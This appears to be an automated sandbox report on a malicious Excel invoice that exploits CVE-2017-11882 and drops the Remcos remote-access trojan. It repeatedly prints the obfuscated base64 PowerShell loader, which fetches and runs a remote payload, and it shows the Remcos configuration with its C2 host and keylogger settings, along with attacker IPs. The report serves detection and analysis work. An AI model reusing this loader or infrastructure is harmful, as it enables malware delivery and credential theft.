C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9dScrJ3InKydsID0gJysnezJ9JysnaHR0cCcrJ3MnKyc6Ly8nKydyYXcuZycrJ2knKyd0aHUnKydidXMnKydlcmNvJysnbnRlbicrJ3QnKycuJysnYycrJ29tL05vRGV0ZScrJ2N0T24nKycvTm9EZXRlY3QnKydPbi9yZWZzJysnL2hlYWRzL21haScrJ24vJysnRGV0YScrJ2hOJysnb3RoLVYudCcrJ3gnKyd0ezInKyd9OyB7JysnMX1iJysnYScrJ3NlJysnNicrJzQnKydDbycrJ24nKyd0ZW50ID0gJysnKE5ldycrJy0nKydPYicrJ2plY3QgUycrJ3knKydzJysndGVtLk5ldC5XZWJDbCcrJ2knKydlbnQpLkQnKydvJysnd24nKydsb2FkU3RyaW4nKydnKHsxfXVybCknKyc7IHsnKycxJysnfScrJ2JpbicrJ2FyeUMnKydvbnRlbnQnKycgPSBbJysnU3knKydzdGVtJysnLicrJ0MnKydvbnZlcnRdOjpGcicrJ28nKydtJysnQicrJ2FzZTY0JysnU3RyaW4nKydnKHsxfWJhc2U2NEMnKydvbnQ
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9dScrJ3InKydsID0gJysnezJ9JysnaHR0cCcrJ3MnKyc6Ly8nKydyYXcuZycrJ2knKyd0aHUnKydidXMnKydlcmNvJysnbnRlbicrJ3QnKycuJysnYycrJ29tL05vRGV0ZScrJ2N0T24nKycvTm9EZXRlY3QnKydPbi9yZWZzJysnL2hlYWRzL21haScrJ24vJysnRGV0YScrJ2hOJysnb3RoLVYudCcrJ3gnKyd0ezInKyd9OyB7JysnMX1iJysnYScrJ3NlJysnNicrJzQnKydDbycrJ24nKyd0ZW50ID0gJysnKE5ldycrJy0nKydPYicrJ2plY3QgUycrJ3knKydzJysndGVtLk5ldC5XZWJDbCcrJ2knKydlbnQpLkQnKydvJysnd24nKydsb2FkU3RyaW4nKydnKHsxfXVybCknKyc7IHsnKycxJysnfScrJ2JpbicrJ2FyeUMnKydvbnRlbnQnKycgPSBbJysnU3knKydzdGVtJysnLicrJ0MnKydvbnZlcnRdOjpGcicrJ28nKydtJysnQicrJ2FzZTY0JysnU3RyaW4nKydnKHsxfWJhc2U2NEMnKydvbnQnKydlbnQpOycrJyAnKyd7MX1hc3NlbWJseSAnKyc9JysnICcrJ1tSZWZsZWMnKyd0JysnaW9uJysnLkFzc2VtJysnYmx5XTo6TG9hZCcrJyh7JysnMScrJ30nKydiJysnaW5hcicrJ3lDb250JysnZScrJ24nKyd0JysnKTsgWycrJ2RubGliJysnLicrJ0lPLkhvbWVdOjpWQUkoezB9dHgnKyd0LlInKydFU1MnKydTRCcrJ1IvMDU0LzkuNDQuMDQnKycyLjgzJysnLy86cHR0JysnaHsnKycwfScrJywnKycgezB9ZGVzYXRpdmFkb3swfSwgeycrJzB9ZGVzJysnYXRpdmFkJysnb3swfSwgeycrJzB9ZGUnKydzJysnYScrJ3RpdicrJ2Fkb3swfSwnKycgezB9UmUnKydnJysnQXNtezB9LCAnKyd7MH17MH0nKycsezAnKyd9JysnezB9KScpLWYgIFtjaGFSXTM0LFtjaGFSXTM2LFtjaGFSXTM5KSB8IC4oICRTSEVMTElkWzFdKyRTaEVsbElkWzEzXSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9dScrJ3InKydsID0gJysnezJ9JysnaHR0cCcrJ3MnKyc6Ly8nKydyYXcuZycrJ2knKyd0aHUnKydidXMnKydlcmNvJysnbnRlbicrJ3QnKycuJysnYycrJ29tL05vRGV0ZScrJ2N0T24nKycvTm9EZXRlY3QnKydPbi9yZWZzJysnL2hlYWRzL21haScrJ24vJysnRGV0YScrJ2hOJysnb3RoLVYudCcrJ3gnKyd0ezInKyd9OyB7JysnMX1iJysnYScrJ3NlJysnNicrJzQnKydDbycrJ24nKyd0ZW50ID0gJysnKE5ldycrJy0nKydPYicrJ2plY3QgUycrJ3knKydzJysndGVtLk5ldC5XZWJDbCcrJ2knKydlbnQpLkQnKydvJysnd24nKydsb2FkU3RyaW4nKydnKHsxfXVybCknKyc7IHsnKycxJysnfScrJ2JpbicrJ2FyeUMnKydvbnRlbnQnKycgPSBbJysnU3knKydzdGVtJysnLicrJ0MnKydvbnZlcnRdOjpGcicrJ28nKydtJysnQicrJ2FzZTY0JysnU3RyaW4nKydnKHsxfWJhc2U2NEMnKydvbnQnKydlbnQpOycrJyAnKyd7MX1hc3NlbWJseSAnKyc9JysnICcrJ1tSZWZsZWMnKyd0JysnaW9uJysnLkFzc2VtJysnYmx5XTo6TG9hZCcrJyh7JysnMScrJ30nKydiJysnaW5hcicrJ3lDb250JysnZScrJ24nKyd0JysnKTsgWycrJ2RubGliJysnLicrJ0lPLkhvbWVdOjpWQUkoezB9dHgnKyd0LlInKydFU1MnKydTRCcrJ1IvMDU0LzkuNDQuMDQnKycyLjgzJysnLy86cHR0JysnaHsnKycwfScrJywnKycgezB9ZGVzYXRpdmFkb3swfSwgeycrJzB9ZGVzJysnYXRpdmFkJysnb3swfSwgeycrJzB9ZGUnKydzJysnYScrJ3RpdicrJ2Fkb3swfSwnKycgezB9UmUnKydnJysnQXNtezB9LCAnKyd7MH17MH0nKycsezAnKyd9JysnezB9KScpLWYgIFtjaGFSXTM0LFtjaGFSXTM2LFtjaGFSXTM5KSB8IC4oICRTSEVMTElkWzFdKyRTaEVsbElkWzEzXSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe,
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\newsweetnesswithverynicecute.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\newsweetnesswithverynicecute.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3320, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\newsweetnesswithverynicecute.vbS" , ProcessId: 4060, ProcessName: wscript.exe
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\newsweetnesswithverynicecute.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\newsweetnesswithverynicecute.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3320, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\newsweetnesswithverynicecute.vbS" , ProcessId: 4060, ProcessName: wscript.exe
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9dScrJ3InKydsID0gJysnezJ9JysnaHR0cCcrJ3MnKyc6Ly8nKydyYXcuZycrJ2knKyd0aHUnKydidXMnKydlcmNvJysnbnRlbicrJ3QnKycuJysnYycrJ29tL05vRGV0ZScrJ2N0T24nKycvTm9EZXRlY3QnKydPbi9yZWZzJysnL2hlYWRzL21haScrJ24vJysnRGV0YScrJ2hOJysnb3RoLVYudCcrJ3gnKyd0ezInKyd9OyB7JysnMX1iJysnYScrJ3NlJysnNicrJzQnKydDbycrJ24nKyd0ZW50ID0gJysnKE5ldycrJy0nKydPYicrJ2plY3QgUycrJ3knKydzJysndGVtLk5ldC5XZWJDbCcrJ2knKydlbnQpLkQnKydvJysnd24nKydsb2FkU3RyaW4nKydnKHsxfXVybCknKyc7IHsnKycxJysnfScrJ2JpbicrJ2FyeUMnKydvbnRlbnQnKycgPSBbJysnU3knKydzdGVtJysnLicrJ0MnKydvbnZlcnRdOjpGcicrJ28nKydtJysnQicrJ2FzZTY0JysnU3RyaW4nKydnKHsxfWJhc2U2NEMnKydvbnQnKydlbnQpOycrJyAnKyd7MX1hc3NlbWJseSAnKyc9JysnICcrJ1tSZWZsZWMnKyd0JysnaW9uJysnLkFzc2VtJysnYmx5XTo6TG9hZCcrJyh7JysnMScrJ30nKydiJysnaW5hcicrJ3lDb250JysnZScrJ24nKyd0JysnKTsgWycrJ2RubGliJysnLicrJ0lPLkhvbWVdOjpWQUkoezB9dHgnKyd0LlInKydFU1MnKydTRCcrJ1IvMDU0LzkuNDQuMDQnKycyLjgzJysnLy86cHR0JysnaHsnKycwfScrJywnKycgezB9ZGVzYXRpdmFkb3swfSwgeycrJzB9ZGVzJysnYXRpdmFkJysnb3swfSwgeycrJzB9ZGUnKydzJysnYScrJ3RpdicrJ2Fkb3swfSwnKycgezB9UmUnKydnJysnQXNtezB9LCAnKyd7MH17MH0nKycsezAnKyd9JysnezB9KScpLWYgIFtjaGFSXTM0LFtjaGFSXTM2LFtjaGFSXTM5KSB8IC4oICRTSEVMTElkWzFdKyRTaEVsbElkWzEzXSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9dScrJ3InKydsID0gJysnezJ9JysnaHR0cCcrJ3MnKyc6Ly8nKydyYXcuZycrJ2knKyd0aHUnKydidXMnKydlcmNvJysnbnRlbicrJ3QnKycuJysnYycrJ29tL05vRGV0ZScrJ2N0T24nKycvTm9EZXRlY3QnKydPbi9yZWZzJysnL2hlYWRzL21haScrJ24vJysnRGV0YScrJ2hOJysnb3RoLVYudCcrJ3gnKyd0ezInKyd9OyB7JysnMX1iJysnYScrJ3NlJysnNicrJzQnKydDbycrJ24nKyd0ZW50ID0gJysnKE5ldycrJy0nKydPYicrJ2plY3QgUycrJ3knKydzJysndGVtLk5ldC5XZWJDbCcrJ2knKydlbnQpLkQnKydvJysnd24nKydsb2FkU3RyaW4nKydnKHsxfXVybCknKyc7IHsnKycxJysnfScrJ2JpbicrJ2FyeUMnKydvbnRlbnQnKycgPSBbJysnU3knKydzdGVtJysnLicrJ0MnKydvbnZlcnRdOjpGcicrJ28nKydtJysnQicrJ2FzZTY0JysnU3RyaW4nKydnKHsxfWJhc2U2NEMnKydvbnQnKydlbnQpOycrJyAnKyd7MX1hc3NlbWJseSAnKyc9JysnICcrJ1tSZWZsZWMnKyd0JysnaW9uJysnLkFzc2VtJysnYmx5XTo6TG9hZCcrJyh7JysnMScrJ30nKydiJysnaW5hcicrJ3lDb250JysnZScrJ24nKyd0JysnKTsgWycrJ2RubGliJysnLicrJ0lPLkhvbWVdOjpWQUkoezB9dHgnKyd0LlInKydFU1MnKydTRCcrJ1IvMDU0LzkuNDQuMDQnKycyLjgzJysnLy86cHR0JysnaHsnKycwfScrJywnKycgezB9ZGVzYXRpdmFkb3swfSwgeycrJzB9ZGVzJysnYXRpdmFkJysnb3swfSwgeycrJzB9ZGUnKydzJysnYScrJ3RpdicrJ2Fkb3swfSwnKycgezB9UmUnKydnJysnQXNtezB9LCAnKyd7MH17MH0nKycsezAnKyd9JysnezB9KScpLWYgIFtjaGFSXTM0LFtjaGFSXTM2LFtjaGFSXTM5KSB8IC4oICRTSEVMTElkWzFdKyRTaEVsbElkWzEzXSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe,
                    Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 14.194.50.211, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3320, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
                    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\umamwkvoyd", CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\umamwkvoyd", CommandLine|base64offset|contains: ^, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 1436, ParentProcessName: RegAsm.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\umamwkvoyd", ProcessId: 2032, ProcessName: RegAsm.exe
                    Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3320, Protocol: tcp, SourceIp: 14.194.50.211, SourceIsIpv6: false, SourcePort: 443
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\newsweetnesswithverynicecute.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\newsweetnesswithverynicecute.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3320, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\newsweetnesswithverynicecute.vbS" , ProcessId: 4060, ProcessName: wscript.exe
                    Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3320, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9dScrJ3InKydsID0gJysnezJ9JysnaHR0cCcrJ3MnKyc6Ly8nKydyYXcuZycrJ2knKyd0aHUnKydidXMnKydlcmNvJysnbnRlbicrJ3QnKycuJysnYycrJ29tL05vRGV0ZScrJ2N0T24nKycvTm9EZXRlY3QnKydPbi9yZWZzJysnL2hlYWRzL21haScrJ24vJysnRGV0YScrJ2hOJysnb3RoLVYudCcrJ3gnKyd0ezInKyd9OyB7JysnMX1iJysnYScrJ3NlJysnNicrJzQnKydDbycrJ24nKyd0ZW50ID0gJysnKE5ldycrJy0nKydPYicrJ2plY3QgUycrJ3knKydzJysndGVtLk5ldC5XZWJDbCcrJ2knKydlbnQpLkQnKydvJysnd24nKydsb2FkU3RyaW4nKydnKHsxfXVybCknKyc7IHsnKycxJysnfScrJ2JpbicrJ2FyeUMnKydvbnRlbnQnKycgPSBbJysnU3knKydzdGVtJysnLicrJ0MnKydvbnZlcnRdOjpGcicrJ28nKydtJysnQicrJ2FzZTY0JysnU3RyaW4nKydnKHsxfWJhc2U2NEMnKydvbnQnKydlbnQpOycrJyAnKyd7MX1hc3NlbWJseSAnKyc9JysnICcrJ1tSZWZsZWMnKyd0JysnaW9uJysnLkFzc2VtJysnYmx5XTo6TG9hZCcrJyh7JysnMScrJ30nKydiJysnaW5hcicrJ3lDb250JysnZScrJ24nKyd0JysnKTsgWycrJ2RubGliJysnLicrJ0lPLkhvbWVdOjpWQUkoezB9dHgnKyd0LlInKydFU1MnKydTRCcrJ1IvMDU0LzkuNDQuMDQnKycyLjgzJysnLy86cHR0JysnaHsnKycwfScrJywnKycgezB9ZGVzYXRpdmFkb3swfSwgeycrJzB9ZGVzJysnYXRpdmFkJysnb3swfSwgeycrJzB9ZGUnKydzJysnYScrJ3RpdicrJ2Fkb3swfSwnKycgezB9UmUnKydnJysnQXNtezB9LCAnKyd7MH17MH0nKycsezAnKyd9JysnezB9KScpLWYgIFtjaGFSXTM0LFtjaGFSXTM2LFtjaGFSXTM5KSB8IC4oICRTSEVMTElkWzFdKyRTaEVsbElkWzEzXSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9dScrJ3InKydsID0gJysnezJ9JysnaHR0cCcrJ3MnKyc6Ly8nKydyYXcuZycrJ2knKyd0aHUnKydidXMnKydlcmNvJysnbnRlbicrJ3QnKycuJysnYycrJ29tL05vRGV0ZScrJ2N0T24nKycvTm9EZXRlY3QnKydPbi9yZWZzJysnL2hlYWRzL21haScrJ24vJysnRGV0YScrJ2hOJysnb3RoLVYudCcrJ3gnKyd0ezInKyd9OyB7JysnMX1iJysnYScrJ3NlJysnNicrJzQnKydDbycrJ24nKyd0ZW50ID0gJysnKE5ldycrJy0nKydPYicrJ2plY3QgUycrJ3knKydzJysndGVtLk5ldC5XZWJDbCcrJ2knKydlbnQpLkQnKydvJysnd24nKydsb2FkU3RyaW4nKydnKHsxfXVybCknKyc7IHsnKycxJysnfScrJ2JpbicrJ2FyeUMnKydvbnRlbnQnKycgPSBbJysnU3knKydzdGVtJysnLicrJ0MnKydvbnZlcnRdOjpGcicrJ28nKydtJysnQicrJ2FzZTY0JysnU3RyaW4nKydnKHsxfWJhc2U2NEMnKydvbnQnKydlbnQpOycrJyAnKyd7MX1hc3NlbWJseSAnKyc9JysnICcrJ1tSZWZsZWMnKyd0JysnaW9uJysnLkFzc2VtJysnYmx5XTo6TG9hZCcrJyh7JysnMScrJ30nKydiJysnaW5hcicrJ3lDb250JysnZScrJ24nKyd0JysnKTsgWycrJ2RubGliJysnLicrJ0lPLkhvbWVdOjpWQUkoezB9dHgnKyd0LlInKydFU1MnKydTRCcrJ1IvMDU0LzkuNDQuMDQnKycyLjgzJysnLy86cHR0JysnaHsnKycwfScrJywnKycgezB9ZGVzYXRpdmFkb3swfSwgeycrJzB9ZGVzJysnYXRpdmFkJysnb3swfSwgeycrJzB9ZGUnKydzJysnYScrJ3RpdicrJ2Fkb3swfSwnKycgezB9UmUnKydnJysnQXNtezB9LCAnKyd7MH17MH0nKycsezAnKyd9JysnezB9KScpLWYgIFtjaGFSXTM0LFtjaGFSXTM2LFtjaGFSXTM5KSB8IC4oICRTSEVMTElkWzFdKyRTaEVsbElkWzEzXSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe,
                    Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3616, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3120, TargetFilename: C:\Users\user\AppData\Local\Temp\kvq1sere.f3k.ps1

                    Stealing of Sensitive Information

                    barindex
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 1436, TargetFilename: C:\ProgramData\remcos\logs.dat
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-07T14:53:14.905261+020020204231Exploit Kit Activity Detected38.240.44.980192.168.2.2249176TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-07T14:53:14.905261+020020204251Exploit Kit Activity Detected38.240.44.980192.168.2.2249176TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-07T14:53:17.535329+020020365941Malware Command and Control Activity Detected192.168.2.2249177192.3.101.1849674TCP
                    2024-10-07T14:53:18.647843+020020365941Malware Command and Control Activity Detected192.168.2.2249178192.3.101.1849674TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-07T14:53:18.773612+020028033043Unknown Traffic192.168.2.2249179178.237.33.5080TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{93BF753C-FD01-4E16-B48B-F8FB75D6D297}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
                    Source: 00000013.00000002.642581330.0000000000B91000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "ugnrv.duckdns.org:9674:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-0BYJUE", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                    Source: invoice_45009.xlsReversingLabs: Detection: 13%
                    Source: Yara matchFile source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.powershell.exe.3ac0b60.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.powershell.exe.3ac0b60.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000013.00000002.642861861.000000000241E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.642709056.0000000000BCB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.642581330.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.642581330.0000000000B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.487113772.0000000003439000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.487113772.0000000003659000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2880, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1436, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: invoice_45009.xlsJoe Sandbox ML: detected
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,19_2_004338C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_00404423 FreeLibrary,CryptUnprotectData,20_2_00404423
                    Source: powershell.exe, 00000010.00000002.487113772.0000000003659000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_84ea3fb4-f

                    Exploits

                    barindex
                    Source: Yara matchFile source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.powershell.exe.3ac0b60.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.powershell.exe.3ac0b60.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.487113772.0000000003439000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.487113772.0000000003659000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2880, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1436, type: MEMORYSTR
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 38.240.44.9 Port: 80Jump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
                    Source: ~WRF{93BF753C-FD01-4E16-B48B-F8FB75D6D297}.tmp.4.drStream path '_1789796334/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                    Source: ~WRF{93BF753C-FD01-4E16-B48B-F8FB75D6D297}.tmp.4.drStream path '_1789796339/\x1CompObj' : ...................F....Microsoft Equation 3.0....
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

                    Privilege Escalation

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00407538 _wcslen,CoGetObject,19_2_00407538
                    Source: unknownHTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49166 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49167 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49168 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49169 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.22:49174 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49173 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 14.194.50.211:443 -> 192.168.2.22:49175 version: TLS 1.0
